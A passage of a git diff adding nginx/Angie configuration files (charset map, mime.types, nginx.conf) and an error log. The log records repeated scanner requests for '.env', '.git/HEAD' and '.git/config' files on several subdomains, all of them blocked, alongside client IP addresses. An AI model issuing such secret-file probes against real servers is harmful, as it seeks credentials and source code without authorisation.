; # small ts + C4 E4 ; # small d + C5 E5 ; # small ye + C6 F4 ; # small f + C7 E3 ; # small g + C8 F5 ; # small kh + C9 E8 ; # small i + CA E9 ; # small j + CB EA ; # small k + CC EB ; # small l + CD EC ; # small m + CE ED ; # small n + CF EE ; # small o + + D0 EF ; # small p + D1 FF ; # small ya + D2 F0 ; # small r + D3 F1 ; # small s + D4 F2 ; # small t + D5 F3 ; # small u + D6 E6 ; # small zh + D7 E2 ; # small v + D8 FC ; # small soft sign + D9 FB ; # small y + DA E7 ; # small z + DB F8 ; # small sh + DC FD ; # small e + DD F9 ; # small shch + DE F7 ; # small ch + DF FA ; # small hard sign + + E0 DE ; # capital YU + E1 C0 ; # capital A + E2 C1 ; # capital B + E3 D6 ; # capital TS + E4 C4 ; # capital D + E5 C5 ; # capital YE + E6 D4 ; # capital F + E7 C3 ; # capital G + E8 D5 ; # capital KH + E9 C8 ; # capital I + EA C9 ; # capital J + EB CA ; # capital K + EC CB ; # capital L + ED CC ; # capital M + EE CD ; # capital N + EF CE ; # capital O + + F0 CF ; # capital P + F1 DF ; # capital YA + F2 D0 ; # capital R + F3 D1 ; # capital S + F4 D2 ; # capital T + F5 D3 ; # capital U + F6 C6 ; # capital ZH + F7 C2 ; # capital V + F8 DC ; # capital soft sign + F9 DB ; # capital Y + FA C7 ; # capital Z + FB D8 ; # capital SH + FC DD ; # capital E + FD D9 ; # capital SHCH + FE D7 ; # capital CH + FF DA ; # capital hard sign +} diff --git a/mime.types b/mime.types new file mode 100644 index 0000000..4321314 --- /dev/null +++ b/mime.types @@ -0,0 +1,99 @@ + +types { + text/html html htm shtml; + text/css css; + text/xml xml; + image/gif gif; + image/jpeg jpeg jpg; + application/javascript js; + application/atom+xml atom; + application/rss+xml rss; + + text/mathml mml; + text/plain txt; + text/vnd.sun.j2me.app-descriptor jad; + text/vnd.wap.wml wml; + text/x-component htc; + + image/avif avif; + image/bmp bmp; + image/png png; + image/svg+xml svg svgz; + image/tiff tif tiff; + image/vnd.wap.wbmp wbmp; + image/webp webp; + image/x-icon ico; + image/x-jng jng; + + font/woff woff; + font/woff2 woff2; + + application/java-archive jar war ear; + application/json json; + application/mac-binhex40 hqx; + application/msword doc; + application/pdf pdf; + application/postscript ps eps ai; + application/rtf rtf; + application/vnd.apple.mpegurl m3u8; + application/vnd.debian.binary-package deb udeb; + application/vnd.google-earth.kml+xml kml; + application/vnd.google-earth.kmz kmz; + application/vnd.ms-excel xls; + application/vnd.ms-fontobject eot; + application/vnd.ms-powerpoint ppt; + application/vnd.oasis.opendocument.graphics odg; + application/vnd.oasis.opendocument.presentation odp; + application/vnd.oasis.opendocument.spreadsheet ods; + application/vnd.oasis.opendocument.text odt; + application/vnd.openxmlformats-officedocument.presentationml.presentation + pptx; + application/vnd.openxmlformats-officedocument.spreadsheetml.sheet + xlsx; + application/vnd.openxmlformats-officedocument.wordprocessingml.document + docx; + application/vnd.rar rar; + application/vnd.wap.wmlc wmlc; + application/wasm wasm; + application/x-7z-compressed 7z; + application/x-cocoa cco; + application/x-java-archive-diff jardiff; + application/x-java-jnlp-file jnlp; + application/x-makeself run; + application/x-perl pl pm; + application/x-pilot prc pdb; + application/x-redhat-package-manager rpm; + application/x-sea sea; + application/x-shockwave-flash swf; + application/x-stuffit sit; + application/x-tcl tcl tk; + application/x-x509-ca-cert der pem crt; + application/x-xpinstall xpi; + application/xhtml+xml xhtml; + application/xspf+xml xspf; + application/zip zip; + + application/octet-stream bin exe dll; + application/octet-stream dmg; + application/octet-stream iso img; + application/octet-stream msi msp msm; + + audio/midi mid midi kar; + audio/mpeg mp3; + audio/ogg ogg; + audio/x-m4a m4a; + audio/x-realaudio ra; + + video/3gpp 3gpp 3gp; + video/mp2t ts; + video/mp4 mp4; + video/mpeg mpeg mpg; + video/quicktime mov; + video/webm webm; + video/x-flv flv; + video/x-m4v m4v; + video/x-mng mng; + video/x-ms-asf asx asf; + video/x-ms-wmv wmv; + video/x-msvideo avi; +} diff --git a/modules b/modules new file mode 120000 index 0000000..74356b4 --- /dev/null +++ b/modules @@ -0,0 +1 @@ +/usr/lib/angie/modules \ No newline at end of file diff --git a/nginx.conf b/nginx.conf new file mode 100755 index 0000000..7054ef4 --- /dev/null +++ b/nginx.conf @@ -0,0 +1,54 @@ + +user www-data; +pid /run/angie.pid; +worker_processes auto; +worker_rlimit_nofile 65535; + +events { + multi_accept on; + worker_connections 65535; +} + +http { + + log_format main '$remote_addr $remote_port - $remote_user [$time_local] "$request" ' + '$status $body_bytes_sent "$http_referer" ' + '"$http_user_agent" "$http_x_forwarded_for" "$http_cookie" "$sent_http_set_cookie" "$http_host" "$http3"'; + + + #charset utf-8; + sendfile on; + tcp_nopush on; + tcp_nodelay on; + server_tokens off; + log_not_found off; + types_hash_max_size 2048; + client_max_body_size 16M; + client_body_buffer_size 32M; + + # MIME + include mime.types; + default_type application/octet-stream; + + # Logging + access_log /var/log/nginx/access.log; + error_log /var/log/nginx/error.log warn; + + # SSL + ssl_session_timeout 1d; + ssl_session_cache shared:SSL:10m; + ssl_session_tickets off; + + # Mozilla Modern configuration + ssl_protocols TLSv1.3 TLSv1.2; + + # OCSP Stapling + ssl_stapling on; + ssl_stapling_verify on; + resolver 1.1.1.1 1.0.0.1 8.8.8.8 8.8.4.4 valid=60s; + resolver_timeout 2s; + + # Load configs + include /etc/nginx/conf.d/*.conf; + include /etc/nginx/sites-enabled/*; +} diff --git a/nginx.conf.dpkg-dist b/nginx.conf.dpkg-dist new file mode 100755 index 0000000..5e076aa --- /dev/null +++ b/nginx.conf.dpkg-dist @@ -0,0 +1,32 @@ + +user nginx; +worker_processes auto; + +error_log /var/log/nginx/error.log notice; +pid /var/run/nginx.pid; + + +events { + worker_connections 1024; +} + + +http { + include /etc/nginx/mime.types; + default_type application/octet-stream; + + log_format main '$remote_addr - $remote_user [$time_local] "$request" ' + '$status $body_bytes_sent "$http_referer" ' + '"$http_user_agent" "$http_x_forwarded_for"'; + + access_log /var/log/nginx/access.log main; + + sendfile on; + #tcp_nopush on; + + keepalive_timeout 65; + + #gzip on; + + include /etc/nginx/conf.d/*.conf; +} diff --git a/off b/off new file mode 100644 index 0000000..2b9b24b --- /dev/null +++ b/off @@ -0,0 +1,3859 @@ +2020/10/23 11:08:20 [error] 16696#16696: *18816 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.129.241, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2020/10/23 11:08:21 [error] 16696#16696: *18816 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.129.241, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2020/11/08 03:18:23 [error] 17505#17505: *64842 access forbidden by rule, client: 217.61.113.218, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/11/09 11:57:54 [error] 22837#22837: *1 FastCGI sent in stderr: "PHP message: PHP Warning: mysqli::__construct(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /var/www/rspamd-quarantine/index.php on line 4 +PHP message: PHP Warning: mysqli::__construct(): (HY000/2002): php_network_getaddresses: getaddrinfo failed: Name or service not known in /var/www/rspamd-quarantine/index.php on line 4" while reading response header from upstream, client: 77.65.85.134, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "fastcgi://unix:/run/php/php-fpm-mail.sock:", host: "quarantine.linuxiarz.pl" +2020/11/09 12:01:19 [error] 23298#23298: *1 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to a member function fetch_assoc() on boolean in /var/www/rspamd-quarantine/index.php:55 +Stack trace: +#0 {main} + thrown in /var/www/rspamd-quarantine/index.php on line 55" while reading response header from upstream, client: 77.65.85.134, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "fastcgi://unix:/run/php/php-fpm-mail.sock:", host: "quarantine.linuxiarz.pl" +2020/11/12 22:50:24 [error] 25793#25793: *24543 access forbidden by rule, client: 46.248.184.3, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/11/12 22:50:24 [error] 25793#25793: *24543 access forbidden by rule, client: 46.248.184.3, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/11/17 16:07:43 [error] 25793#25793: *49976 access forbidden by rule, client: 77.65.97.20, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/11/17 16:19:18 [error] 25793#25793: *50023 access forbidden by rule, client: 77.65.97.20, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/11/26 10:21:05 [error] 25793#25793: *102907 access forbidden by rule, client: 138.99.216.112, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "pliki.linuxiarz.pl" +2020/11/26 10:21:05 [error] 25792#25792: *102909 access forbidden by rule, client: 138.99.216.112, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2020/11/30 17:57:49 [error] 25793#25793: *129600 access forbidden by rule, client: 35.196.187.224, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/01 17:08:39 [error] 25793#25793: *134877 access forbidden by rule, client: 35.196.187.224, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 06:57:20 [error] 25793#25793: *164559 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:57:45 [error] 25793#25793: *164561 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:58:05 [error] 25793#25793: *164563 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:58:26 [error] 25793#25793: *164565 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:58:47 [error] 25793#25793: *164568 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:59:06 [error] 25793#25793: *164570 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:59:29 [error] 25793#25793: *164572 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 06:59:50 [error] 25793#25793: *164574 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/05 07:00:33 [error] 25793#25793: *164578 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:00:53 [error] 25793#25793: *164580 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:01:16 [error] 25793#25793: *164582 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:01:37 [error] 25793#25793: *164584 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:01:59 [error] 25793#25793: *164586 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:02:20 [error] 25793#25793: *164589 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:02:40 [error] 25793#25793: *164591 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:03:01 [error] 25793#25793: *164595 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/05 07:03:46 [error] 25793#25793: *164599 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:04:07 [error] 25793#25793: *164610 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:04:28 [error] 25793#25793: *164612 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:04:53 [error] 25793#25793: *164614 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:05:19 [error] 25793#25793: *164616 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:05:38 [error] 25793#25793: *164618 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:06:02 [error] 25793#25793: *164620 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/05 07:06:22 [error] 25793#25793: *164622 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/21 14:16:15 [error] 2560#2560: *76103 access forbidden by rule, client: 109.173.208.96, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/12/21 14:17:09 [error] 2560#2560: *76103 access forbidden by rule, client: 109.173.208.96, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/12/21 14:17:11 [error] 2560#2560: *76103 access forbidden by rule, client: 109.173.208.96, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/12/22 06:58:34 [error] 4555#4555: *1295 access forbidden by rule, client: 199.249.230.144, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/22 06:58:36 [error] 4555#4555: *1296 access forbidden by rule, client: 199.249.230.144, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/25 00:08:27 [error] 1374#1374: *41130 access forbidden by rule, client: 109.173.148.135, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2020/12/26 04:31:28 [error] 1374#1374: *47347 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:32:00 [error] 1374#1374: *47357 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:32:26 [error] 1374#1374: *47360 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:32:57 [error] 1374#1374: *47362 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:33:27 [error] 1374#1374: *47364 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:33:57 [error] 1374#1374: *47366 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:34:28 [error] 1374#1374: *47372 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:34:55 [error] 1374#1374: *47374 access forbidden by rule, client: 82.165.117.55, server: nginx.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2020/12/26 04:35:51 [error] 1374#1374: *47382 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:36:18 [error] 1374#1374: *47384 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:36:44 [error] 1374#1374: *47386 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:37:11 [error] 1374#1374: *47390 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:37:37 [error] 1374#1374: *47392 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:38:01 [error] 1374#1374: *47395 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:38:25 [error] 1374#1374: *47399 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:38:47 [error] 1374#1374: *47402 access forbidden by rule, client: 82.165.117.55, server: pliki.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2020/12/26 04:39:38 [error] 1374#1374: *47406 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:40:00 [error] 1374#1374: *47408 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:40:21 [error] 1374#1374: *47413 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:40:42 [error] 1374#1374: *47417 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:41:02 [error] 1374#1374: *47421 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:41:21 [error] 1374#1374: *47425 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:41:43 [error] 1374#1374: *47427 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/26 04:42:05 [error] 1374#1374: *47429 access forbidden by rule, client: 82.165.117.55, server: kodi.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2020/12/27 11:23:44 [error] 1374#1374: *53546 access forbidden by rule, client: 109.173.148.135, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2021/01/04 21:59:02 [error] 1374#1374: *104308 access forbidden by rule, client: 109.173.148.135, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2021/01/08 23:43:18 [error] 1374#1374: *127882 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.147.93, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/01/08 23:43:19 [error] 1374#1374: *127882 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.147.93, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/01/08 23:49:35 [error] 1374#1374: *128183 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.147.93, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/01/08 23:49:35 [error] 1374#1374: *128183 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.147.93, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/01/08 23:49:36 [error] 1374#1374: *128183 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.147.93, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/01/08 23:49:36 [error] 1374#1374: *128183 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.147.93, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/01/20 09:20:31 [error] 22646#22646: *118858 access forbidden by rule, client: 179.43.167.227, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/01/20 09:20:32 [error] 22646#22646: *118862 access forbidden by rule, client: 179.43.167.227, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/01/21 22:49:35 [error] 1156#1156: *1002 access forbidden by rule, client: 13.68.240.207, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/01/21 22:49:55 [error] 1156#1156: *1004 access forbidden by rule, client: 13.68.240.207, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/01/22 06:17:13 [error] 1156#1156: *2375 access forbidden by rule, client: 52.87.233.56, server: kodi.linuxiarz.pl, request: "GET //.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/01/22 06:39:31 [error] 1156#1156: *2488 access forbidden by rule, client: 52.87.233.56, server: pliki.linuxiarz.pl, request: "GET //.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/01/23 00:52:28 [error] 1156#1156: *7124 access forbidden by rule, client: 52.87.233.56, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/01/23 00:52:28 [error] 1156#1156: *7126 access forbidden by rule, client: 52.87.233.56, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/01/23 00:52:29 [error] 1156#1156: *7128 access forbidden by rule, client: 52.87.233.56, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/01/23 03:29:07 [error] 1156#1156: *7446 access forbidden by rule, client: 52.87.233.56, server: kodi.linuxiarz.pl, request: "GET //.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/01/23 03:51:20 [error] 1156#1156: *7495 access forbidden by rule, client: 52.87.233.56, server: pliki.linuxiarz.pl, request: "GET //.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/01/23 05:48:32 [error] 1156#1156: *7798 access forbidden by rule, client: 89.44.9.71, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/01/23 06:46:41 [error] 1156#1156: *7902 access forbidden by rule, client: 89.44.9.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/02/09 07:48:54 [error] 1156#1156: *625847 access forbidden by rule, client: 45.41.132.173, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/02/09 07:49:01 [error] 1156#1156: *625850 access forbidden by rule, client: 45.41.132.173, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/02/20 14:04:33 [error] 2202#2202: *379065 access forbidden by rule, client: 18.183.131.87, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/20 18:37:19 [error] 2202#2202: *387034 access forbidden by rule, client: 18.144.17.55, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/20 19:14:46 [error] 2202#2202: *387914 access forbidden by rule, client: 34.209.62.252, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/21 11:31:54 [error] 2202#2202: *415336 access forbidden by rule, client: 34.211.155.250, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/21 18:11:03 [error] 2202#2202: *427974 access forbidden by rule, client: 35.164.185.206, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/21 19:15:31 [error] 2202#2202: *429973 access forbidden by rule, client: 18.157.184.190, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "nginx.linuxiarz.pl" +2021/02/21 21:50:41 [error] 2202#2202: *434928 access forbidden by rule, client: 52.57.237.27, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/21 22:53:29 [error] 2202#2202: *436854 access forbidden by rule, client: 3.124.5.247, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/21 23:15:48 [error] 2202#2202: *437330 access forbidden by rule, client: 18.230.106.207, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/21 23:29:11 [error] 2202#2202: *437571 access forbidden by rule, client: 18.216.57.250, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/22 00:46:21 [error] 2202#2202: *438897 access forbidden by rule, client: 34.218.237.215, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/22 03:34:42 [error] 2202#2202: *442748 access forbidden by rule, client: 35.181.160.49, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/22 08:19:19 [error] 2202#2202: *448359 access forbidden by rule, client: 13.239.63.190, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/22 12:55:57 [error] 2202#2202: *457911 access forbidden by rule, client: 3.126.91.232, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/22 14:22:43 [error] 2202#2202: *461104 access forbidden by rule, client: 18.228.211.155, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/22 14:35:25 [error] 2202#2202: *461580 access forbidden by rule, client: 18.191.57.188, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/22 18:54:57 [error] 2202#2202: *471796 access forbidden by rule, client: 35.181.57.93, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "nginx.linuxiarz.pl" +2021/02/23 00:28:13 [error] 2202#2202: *481773 access forbidden by rule, client: 18.141.218.246, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/23 00:30:53 [error] 2202#2202: *481808 access forbidden by rule, client: 15.165.76.90, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2021/02/23 04:52:27 [error] 2202#2202: *486837 access forbidden by rule, client: 65.1.2.82, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/23 07:59:21 